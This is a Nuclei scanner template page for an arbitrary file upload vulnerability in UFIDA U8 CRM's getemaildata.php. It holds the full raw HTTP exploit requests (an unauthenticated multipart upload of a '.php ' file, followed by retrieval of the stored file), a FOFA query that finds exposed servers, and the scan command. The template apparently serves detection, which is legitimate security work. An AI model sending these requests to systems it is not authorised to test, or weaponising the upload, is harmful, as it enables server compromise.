Skip to content
Nuclei Templates

UFIDA U8-CRM getemaildata - Arbitary File Upload

ID: yonyou-u8-crm-fileupload

Severity: critical

Author: SleepingBag945,pussycat0x

Tags: yonyou,file-upload,u8-crm,intrusive

Description

Section titled “Description”

There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.

YAML Source

Section titled “YAML Source”
id: yonyou-u8-crm-fileupload


info:
  name: UFIDA U8-CRM getemaildata - Arbitary File Upload
  author: SleepingBag945,pussycat0x
  severity: critical
  description: |
    There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="用友U8CRM"
  tags: yonyou,file-upload,u8-crm,intrusive


http:
  - raw:
      - |
        POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 300
        Cache-Control: max-age=0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Origin: null
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8
        Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0


        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="file"; filename="%s.php "
        Content-Type: application/octet-stream


        {{randstr}}
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP
        Content-Disposition: form-data; name="upload"


        upload
        ------WebKitFormBoundaryAVuAKsvesmnWtgEP--
      - |
        GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200 && status_code_2==200"
          - "contains(body_2, '{{randstr}}')"
        condition: and


    extractors:
      - type: regex
        part: body_1
        internal: true
        name: path
        group: 1
        regex:
          - '([a-zA-Z0-9]+)\.tmp\.mht'
# digest: 4a0a00473045022058242c32255d41df2059404b3c06c3f85bf9ea5df76e8ca7c2cfb047d17aea2d022100b6018cadbb1542db9a57403abc6c681065951d2554277b591cf9ccbd6e16074d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml"

View on Github